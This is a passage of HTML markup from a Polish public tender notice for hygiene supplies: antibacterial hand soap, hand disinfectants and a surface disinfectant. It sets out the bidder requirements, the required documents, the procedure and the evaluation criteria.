nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Oświadczenie w zakresie wskazanym w Załączniku nr 2 do SIWZ. Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego (art. 25 ust. 1 pkt. 2 ustawy PZP) Wykonawca zobowiązany będzie do złożenia niżej wymienionych dokumentów:• aktualne karty charakterystyki dla każdego produktu chemicznego opisanego w formularzu cenowym; certyfikaty produktu, ulotki producenta oraz w przypadku zadania nr 5 dokumenty potwierdzające wyniki badań mikrobiologicznych.• zaświadczenie wydane przez Urząd Rejestracji Produktów Leczniczych, wyrobów Medycznych i Produktów biobójczych odnośnie pozwolenia na obrót substancją biobójczą (zadanie nr 2, zadanie nr 3, zadanie nr 4);• atest PZH (świadectwo jakości zdrowotnej) lub równoważny do kontaktu z żywnością (produkty z poz. 4-11, zadanie nr 8 oraz produkty z zadania nr 9)Karty charakterystyki muszą zawierać wyczerpujące informacje dotyczące wymagań zawartych w opisie przedmiotu zamówienia.</span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin dostawy</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-06-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Antybakteryjne mydło do rąk</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Mydło antybakteryjne do mycia rąk typu Epicare 5C lub równoważne o parametrach nie gorszych niż: Zawiera związki powierzchniowo czynne, w całości biodegradowalne zgodnie z regulacją 648/2004EC. Spełnia normy: EN 1040 (30 sekund) EN 1499 (2 ml, 30 sekund), bakteriobójczość wg EN 1276 oraz EN 13727 (30 s warunki brudne), drożdżobójczość wg EN 1650 oraz Pr EN 13624 (60 s warunki brudne), przetestowany zgodnie z wytycznymi DGHM/VAH (3 ml 30 s). Etoksylowany alkohol tłuszczowy1-2,5%, gliceryna 1-2,5% Produkt musi posiadać pozwolenie na obrót produktem biobójczym, wydanym przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. Wymagany atest biobójczości.. Stosowanie: Środek dozowany przez system łokciowy (bezpłatne przekazanie wymaganej ilości 30 szt. dozowników z tworzywa ABS z regulacją dozowania płynu – nowych, z atestem ). Do każdego dozownika dołączona instrukcja mycia rąk. Wartość pH 5,6 – 7,5. Opis przedmiotu zamówienia zawiera załżcznik nr 1 do SIWZ (Formularz cenowy) oraz załącznik nr 1 do umowy (OPZ).Opakowanie: butelka (kanister) - 5L <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33741300-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Środek do dezynfekcji rąk</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Środek do dezynfekcji rąk typu P3-Manodes lub równoważny o parametrach nie gorszych niż: Płyn biobójczy do dezynfekcji rąk po umyciu, łagodny dla skóry i nie powodujący podrażnień, podawany po umyciu rąk z dozownika naściennego. Produkt powinien zawierać w swoim składzie m.in. alkohol etylowy (20-50%). Wartość pH: 6,0-7,2. Opakowanie: 1 L. Produkt musi posiadać pozwolenie na obrót produktem biobójczym, wydanym przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. Wymagany atest biobójczości. Opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ (formularz cenowy) oraz załącznik nr 1 do umowy (OPZ).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33741300-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Środek do dezynfekcji rąk</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Środek do dezynfekcji rąk typu P3-Manodes lub równoważny o parametrach nie gorszych niż: Płyn biobójczy do dezynfekcji rąk po umyciu, łagodny dla skóry i nie powodujący podrażnień, podawany po umyciu rąk z dozownika naściennego. Produkt powinien zawierać w swoim składzie m.in. alkohol etylowy (20-50%). Wartość pH: 6,0-7,2. Opakowanie: 5 L. Produkt musi posiadać pozwolenie na obrót produktem biobójczym, wydanym przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. Wymagany atest biobójczości. Opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ (formularz cenowy) oraz załącznik nr 1 do umowy (OPZ).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>33741300-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin dostawy</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Środek do dezynfekcji powierzchni roboczych.</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Środek do dezynfekcji powierzchni roboczych typu Sirafan Speed lub równoważny o parametrach nie gorszych niż: Przeznaczenie: skoncentrowany środek dezynfekcyjny, eliminujący drobnoustroje i grzyby, jest skuteczny przeciw noro wirusom. Właściwości mikrobiologiczne: - Bakteriobójczy - zgodnie z normą EN 1276, - Grzybobójczy - zgodnie z normą EN 13697, - Drożdżakobójczy - zgodnie z normą EN 1650, - Wirusobójczy wobec Murine Norovirus (MNV). Postać: płyn Opakowanie: butelka ze spryskiwaczem: od 0,75 L do 1 L. Skład chemiczny: 100g produktu zawiera: - 35g alkoholu izopropylowego - 25g alkoholu propylowego - Wartość pH: 7.5 - 8.5 Produkt musi posiadać pozwolenie na obrót produktem biobójczym, wydanym przez Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. Opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ (formularz cenowy) oraz załącznik nr 1 do umowy (OPZ). <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39831240-0, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: 21<br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 